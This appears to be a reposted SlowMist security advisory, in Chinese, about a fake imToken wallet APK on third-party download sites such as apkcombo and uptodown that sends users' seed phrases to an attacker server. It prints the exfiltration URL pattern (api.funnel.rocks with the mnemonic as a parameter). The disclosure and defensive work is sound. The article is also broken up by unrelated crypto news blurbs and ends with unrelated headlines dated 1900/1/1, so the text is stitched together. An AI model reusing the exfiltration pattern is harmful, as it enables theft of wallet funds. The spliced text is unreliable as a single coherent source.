慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。
原文:https://foresightnews.pro/article/h5Detail/31716
作者:山&耀
轉自:ForesightNews
背景
基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。
當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。
巴塞羅那足球俱樂部獲得1.32億美元投資用于Web3戰略:金色財經報道,西班牙巴塞羅那足球俱樂部從Libero football Finance AG和Nipa Capital B.V.獲得了1.2億歐元(1.32億美元)的投資,用于其Web3倡議barpada Vision。根據8月11日的公告,巴塞羅那足球俱樂部出售了barpada Vision控股公司Bridgeburg Invest 29.5%的股份,以換取這筆資金。barpada Vision是俱樂部圍繞Web3和區塊鏈整合所有數字內容的倡議,包括NFT和元宇宙,這是俱樂部建立數字Espai barpada戰略的一部分。
自2020年2月以來,巴塞羅那足球俱樂部與Chiliz區塊鏈合作,為其體育特許經營創建了基于以太坊的BAR球迷代幣。2022年8月,Chiliz宣布以1億美元收購巴塞羅那足球俱樂部(FC Barcelona)數字內容創作部門barpada Vision 24.5%的股份。[2023/8/11 16:21:09]
俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。
Polygon和萬事達卡合作推出Web3藝術家孵化器:1月7日消息,在CES 2023大會上,支付巨頭萬事達卡(Mastercard)宣布與Polygon合作推出一個以Web3為中心的孵化器,為新興藝術家提供Web3工具和技能,幫助他們與粉絲建立聯系將并Web3技術融入自己的作品和項目之中,包括如何鑄造NFT、如何在元宇宙建立社區、如何將內容“Token化”等。
Polygon此前已和星巴克、迪士尼、阿迪達斯、PRADA等品牌建立Web3合作關系。(TechCrunch)[2023/1/7 10:59:47]
在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?
Web3身份構建器Carv完成400萬美元融資,淡馬錫旗下Vertex Ventures領投:11月22日消息,針對游戲玩家的去中心化身份(DID)解決方案 Carv 以 4000 萬美元估值完成 400 萬美元融資,淡馬錫旗下風險投資公司 Vertex Ventures 領投,其他投資方包括 EVOS(ATTN Group)、SNACKCLUB(Loud Gaming)、Infinity Ventures Crypto、YGG SEA、UpHonest Capital、Lyrik Ventures、Lintentry Foundation、PAKADAO、7UpDAO 和天使投資人 Aliaksandr Hadzilin(NEAR 聯合創始人)等。
總部位于洛杉磯的 Carv 主要產品包括一個聚合來自 Web2 和 Web3 的游戲玩家數據引擎,并將這些信息集中在唯一的用戶 ID 下。Carv DID 系統兼容包括以太坊和 Solana 在內的 20 多個 Layer 1 網絡。(TechCrunch)[2022/11/22 7:56:29]
網站分析
Web3.0項目BridgeCoin獲得金麟資本100萬美元投資:據官方消息,由社區驅動的、面向Web3.0 的去中心化加密項目BridgeCoin獲得金麟資本100萬美元投資,將用于BridgeCoin全生態發展。
金麟資本是一家風險投資機構,專注于區塊鏈領域的早期投資,自成立以來,已投資了 100 多個項目。據悉,金麟資本第二支基金 JL VC FUND II已完成800萬美元融資。[2022/8/9 12:12:57]
鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?
我們先看下apkcombo的流量有多大:
谷歌母公司Alphabet CEO計劃投資區塊鏈和Web3:2月7日消息,在 2021 年全年和第四季度財報電話會議上,谷歌母公司 Alphabet Inc. 的首席執行官 Sundar Pichai 表示,該公司正在監控區塊鏈行業和 Web3 的發展,許多科技公司都在涌入該領域并擁有數億美元的投資,Alphabet 可能很快也會效仿。
Pichai 在財報電話會議記錄中還表示,在 Web3 上,Alphabet 肯定會關注區塊鏈,如此有趣和強大的技術,其應用范圍比任何一個應用程序都要廣泛得多。因此,作為一家公司,我們正在研究如何為生態系統做出貢獻并增加價值。此外,Alphabet 的云團隊還正在研究如何支持客戶在基于區塊鏈的平臺上構建、交易、存儲價值和部署新產品的需求,所以我們肯定會密切關注這個空間,并盡可能地支持它。(Dailycoin)[2022/2/7 9:35:52]
據數據統計站點similarweb統計,apkcombo站點:
全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:
那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app
由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app
上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。
在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。
如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。
同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android
我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:
錢包分析
在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。
我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:
根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:
https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>
看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:
俗話說一圖勝千言,最后我們畫一個流程圖:
總結
目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。
同時,如需使用錢包,請務必認準以下主流錢包App官方網址:
imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。
致謝:感謝在溯源過程中imToken官方提供的驗證支持。
由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。
?
Gate.io上架,其中包括BTC&USDTÐ等不同幣種產品。作為保本理財產品,Gate.io旗下結構化產品為用戶提供最高15%的年化收益.
1900/1/1 0:00:00周末,瑞波幣下跌1.60%,部分抵消了前一天5.10%的漲幅。因此,XRP本周收盤下跌10.83%至0.46477美元,這是自3月26日以來第二次收于0.47美元以下.
1900/1/1 0:00:00ForesightNews消息,Bitget平臺幣BGB正式上線加密貨幣交易所Bitfinex,支持的交易對為BGB/USDT.
1900/1/1 0:00:00最近MEME幣的火熱,將上個月出現的brc-20概念又一次帶到新高。談談對brc-20概念幣的看法: 與ETH完全不同的邏輯 因為沒有智能合約,銘文的記錄方式顯得很古早,功能還不完善,很難有大型.
1900/1/1 0:00:00FlokiInu(FLOKI)在Binance.US上市的消息在加密貨幣世界掀起了一場風暴。隨著興奮情緒的升溫,FLOKI的價值在短短一天內飆升了近50%,過去一周的漲幅接近10%,成為市場上最.
1900/1/1 0:00:00ForesightNews消息,由CypherCapital與AIAvatar公司BuzzAR發起的LBS社交圖譜協議Dspace宣布完成100萬美元融資,CypherCapital領投.
1900/1/1 0:00:00